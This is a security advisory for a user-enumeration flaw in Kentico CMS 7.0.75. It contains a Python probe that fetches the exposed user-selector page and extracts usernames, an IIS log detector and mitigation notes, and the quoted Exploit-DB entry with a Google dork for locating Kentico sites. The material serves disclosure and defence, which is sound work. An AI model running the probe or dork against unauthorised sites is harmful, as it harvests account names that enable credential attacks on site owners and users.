Vendor: Kentico CMS
By: Charlie Campbell and Lyndon Mendoza
CVSS: 7.5 (HIGH)
Type: User Enumeration
CWE: CWE-200
Product Name: Kentico CMS
Affected Version From: 7.0.75
Affected Version To: 7.0.75
Patch Exists: YES
Related CWE: N/A
CPE: a:kentico_software:kentico_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2014

Kentico CMS User Enumeration Bug

The vulnerability is an unauthenticated page, the public message user selector of the Messaging module, that lists all current users and their usernames. To check whether a Kentico CMS instance is vulnerable, request http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx, assuming Kentico CMS was installed in the server's root folder; for an installation under a virtual directory, prefix the path with that directory. If the page is served to an anonymous request and lists users, the instance is vulnerable.
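The check above, as an added example that is not part of the original advisory or of Kentico's own code. It builds the probe URL from the application root (so non-root installs are handled), classifies a response, and can run the probe live. The classification rules are assumptions, not something the page states: a protected instance is taken to answer with a non-200 status or a redirect to CMSPages/logon.aspx, and a vulnerable one to return HTML whose usernames sit in option elements or table cells. The sample responses are constructed, not captured from a real site.

```python
"""Probe for the unauthenticated Kentico user-selector page (added example)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
import urllib.error
import urllib.request

# Path from the advisory, relative to the Kentico application root.
SELECTOR_PATH = "CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx"


def probe_url(base_url: str) -> str:
    """Build the probe URL. base_url is the application root, e.g.
    'http://site.com' for a root install or 'http://site.com/cms' for a
    virtual-directory install (assumption: the CMS may live under one)."""
    if not base_url.endswith("/"):
        base_url += "/"
    return urljoin(base_url, SELECTOR_PATH)


class _UserListParser(HTMLParser):
    """Collect the text of <option> elements and <td> cells.
    Assumed markup for the user list; adjust to what the target returns."""

    def __init__(self):
        super().__init__()
        self._capture = False
        self.values = []

    def handle_starttag(self, tag, attrs):
        if tag in ("option", "td"):
            self._capture = True

    def handle_endtag(self, tag):
        if tag in ("option", "td"):
            self._capture = False

    def handle_data(self, data):
        if self._capture and data.strip():
            self.values.append(data.strip())


def classify_response(status: int, final_url: str, body: str) -> dict:
    """Vulnerable = HTTP 200, not bounced to the logon page, and at least one
    username-like entry in the body. Anything else counts as not exposed."""
    path = urlparse(final_url).path.lower()
    if status != 200 or path.endswith("/cmspages/logon.aspx"):
        return {"vulnerable": False, "users": []}
    parser = _UserListParser()
    parser.feed(body)
    # Drop placeholder entries such as an empty "Select user" option.
    users = [v for v in parser.values if v.lower() not in ("select user", "user name")]
    return {"vulnerable": bool(users), "users": users}


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """Live check. urllib follows redirects, so a bounce to logon.aspx shows
    up in the final URL; HTTP errors are classified by status code."""
    url = probe_url(base_url)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
            return classify_response(resp.status, resp.geturl(), body)
    except urllib.error.HTTPError as e:
        return classify_response(e.code, url, "")
    except urllib.error.URLError as e:
        return {"vulnerable": False, "users": [], "error": str(e.reason)}


# Constructed sample responses (not captured from a real site).
SAMPLE_VULNERABLE = """<html><body><select id="userSelector">
<option value="">Select user</option>
<option value="12">administrator</option>
<option value="13">jsmith</option>
</select></body></html>"""
SAMPLE_PATCHED_URL = ("http://site.com/CMSPages/logon.aspx?ReturnUrl="
                      "%2fCMSModules%2fMessaging%2fCMSPages%2fPublicMessageUserSelector.aspx")

if __name__ == "__main__":
    print(probe_url("http://site.com"))
    print(classify_response(200, probe_url("http://site.com"), SAMPLE_VULNERABLE))
    print(classify_response(200, SAMPLE_PATCHED_URL, "<html>login form</html>"))
```

Run probe("http://site.com") against a host you are authorised to test; the offline classification is what the sample data exercises.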

Mitigation:

Apply the vendor patch for the affected Kentico CMS version (the advisory below records that Kentico committed to issuing one).
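Until the patch is on, requests for the exposed page can be watched for in the web server logs. The following is an added example, not from the advisory or the vendor: it parses IIS W3C extended log lines (the standard #Fields header format) and flags requests for the selector path, rating an anonymous request that got HTTP 200 as high (the list was served), an anonymous request that got anything else as low (probe attempted, not served), and an authenticated request as informational. The log lines are constructed, not captured from a real server.

```python
"""Detect access to the Kentico user-selector page in IIS W3C logs (added example)."""
from dataclasses import dataclass

# Path from the advisory, lower-cased; endswith() also matches virtual-directory installs.
SELECTOR_PATH = "/cmsmodules/messaging/cmspages/publicmessageuserselector.aspx"

# Constructed sample log; addresses are documentation ranges, not real clients.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2014-02-25 10:15:01 10.0.0.5 GET /CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 120
2014-02-25 10:15:02 10.0.0.5 GET /CMSPages/logon.aspx - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 30
2014-02-25 10:16:10 10.0.0.5 GET /CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx - 80 - 198.51.100.9 python-requests/2.2 302 0 0 15
2014-02-25 10:17:00 10.0.0.5 GET /cmsmodules/messaging/cmspages/publicmessageuserselector.aspx - 80 admin 192.0.2.4 Mozilla/5.0 200 0 0 90
"""


@dataclass
class Finding:
    timestamp: str
    client_ip: str
    user: str
    status: int
    severity: str


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or malformed line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def detect(text):
    """Return Findings for every request whose URI stem is the selector page."""
    findings = []
    for row in parse_w3c(text):
        if not row["cs-uri-stem"].lower().endswith(SELECTOR_PATH):
            continue
        status = int(row["sc-status"])
        user = row["cs-username"]
        anonymous = user == "-"
        if anonymous and status == 200:
            severity = "high"  # unauthenticated user list was served
        elif anonymous:
            severity = "low"   # probe attempted but not served (e.g. redirect to logon)
        else:
            severity = "info"  # authenticated use of the selector
        findings.append(Finding(f"{row['date']} {row['time']}", row["c-ip"], user, status, severity))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

As a compensating control, the same path can be denied to anonymous users with a standard ASP.NET authorization rule in web.config (a location element for the path containing deny users="?"); this is a general ASP.NET mechanism rather than a vendor recommendation recorded on this page, and it should be tested against the messaging feature before use.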

Exploit-DB raw data:

# Exploit Title: Kentico CMS User Enumeration Bug
# Google Dork: inurl:/CMSPages/logon.aspx <-- enumerates several Kentico CMS sites
# Date: 02-25-2014
# Exploit Author: Charlie Campbell and Lyndon Mendoza
# Vendor Homepage: http://www.kentico.com/
# Software Link: http://www.kentico.com/Download-Demo/Trial-Version
# Version: [Version 7.0.75 and previous versions]

This vulnerability is an unprotected page on the site where you can view all current users and usernames.
To find out if a Kentico CMS is vulnerable go to

http://site.com/CMSModules/Messaging/CMSPages/PublicMessageUserSelector.aspx

assuming that the Kentico CMS was installed to the root folder in the server.

I have already notified the authors and security team for Kentico CMS; in their response they claimed they would issue a patch on 02-21-2014.